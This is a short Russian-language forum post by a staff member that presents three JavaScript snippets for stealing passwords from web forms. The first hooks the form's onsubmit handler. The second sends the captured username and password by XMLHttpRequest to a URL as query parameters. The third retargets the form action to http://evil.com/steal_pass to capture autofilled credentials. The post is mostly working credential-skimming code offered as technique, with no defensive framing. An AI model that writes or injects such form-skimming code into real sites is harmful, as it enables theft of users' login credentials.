Deku
Команда форума
- Регистрация
- 02.01.2020
- Сообщения
- 1 230
- Реакции
- 51
- Баллы
- 63
Три скрипта, которые демонстрируют разные способы кражи пароля из веб-форм.
- Базовый сценарий, который использует атрибут «onsubmit» объекта «form» Javascript для перехвата и использования значений, установленных в форме.
- Другой, который крадет пароль от автозаполнения и отправляет данные на вредоносный URL.
- Последний использует XHR для отправки данных на сторонний сервер
Код:
/*** Method 1 ***/
function intercept () {
var password = document.forms[0].elements[1].value;
/* do whatever you want with "password" */
}
document.forms[0].onsubmit = intercept;
/*** Method 2 ***/
var user = document.forms[0].elements[0].value;
var pass = document.forms[0].elements[1].value;
window.setTimeout( function () {
var request = new XMLHttpRequest();
request.open("GET", "http://localhost:8000/?user="+user+"&pass="+pass, true);
request.send()
}, 5000);
/*** Method 3 ***/
/* stealing from auto-complete */
window.setTimeout(function () {
document.forms[0].action = "http://evil.com/steal_pass";
document.forms[0].submit();
}, 10000);